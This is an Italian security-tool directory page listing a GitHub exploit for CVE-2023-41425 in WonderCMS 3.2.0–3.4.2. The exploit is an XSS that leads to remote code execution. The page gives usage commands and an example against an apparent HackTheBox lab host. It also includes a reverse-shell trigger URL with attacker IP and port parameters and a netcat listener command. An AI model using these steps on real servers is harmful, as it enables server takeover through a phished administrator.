Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — Iniezione XSS, WonderCMS 3.2.0 -3.4.2 | Kitploit
Strumenti/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
Strumenti di PhishingGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-41425-WonderCMS-Authenticated-RCE

Iniezione XSS, WonderCMS 3.2.0 -3.4.2

Vedi Repository
11 anno faNon ancora revisionato

CVE-2023-41425-WonderCMS-Authenticated-RCE

Descrizione

WonderCMS v3.2.0 - v3.4.2 è vulnerabile. Attaccanti remoti possono prendere il pieno controllo del server utilizzando un exploit di Cross-Site Scripting (XSS) (solo a scopo educativo). Ecco il piano:

Come funziona:

L'exploit abusa del componente installModule di WonderCMS per introdurre uno script costruito ad arte che esegue codice arbitrario.

Configurazione

  • Strumento: exploit.py
  • Cosa ti serve:
    • URL target dove WonderCMS è installato (nessuna password admin richiesta).
    • L'IP della tua macchina attaccante.
    • Una porta per il tuo listener di reverse shell.

Esecuzione passo-passo

  1. Lo script genera un file chiamato xss.js. Quest'arma JavaScript è progettata per sfruttare una XSS riflessa.
  2. Produce un link malevolo. Lo invierai all'admin.
  3. La magia avviene quando l'admin (un utente connesso) apre o clicca il tuo link:
    • Richieste in background vengono innescate senza il suo consenso.
    • Un payload di reverse shell viene caricato utilizzando la funzione di upload di temi/plugin.
  4. Una volta caricato, il payload viene eseguito e ti concede una connessione reverse shell diretta al server target.
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

Esempio

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

Sicurezza:

Se la reverse shell non si attiva automaticamente, vai direttamente a:

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

nota:

Ricorda di avviare un listener usando il seguente comando:

root@kitploit:~
nc -lvp 4444

Crediti

prodigiousMind per aver scoperto e riportato la vulnerabilità https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

Scarica lo strumento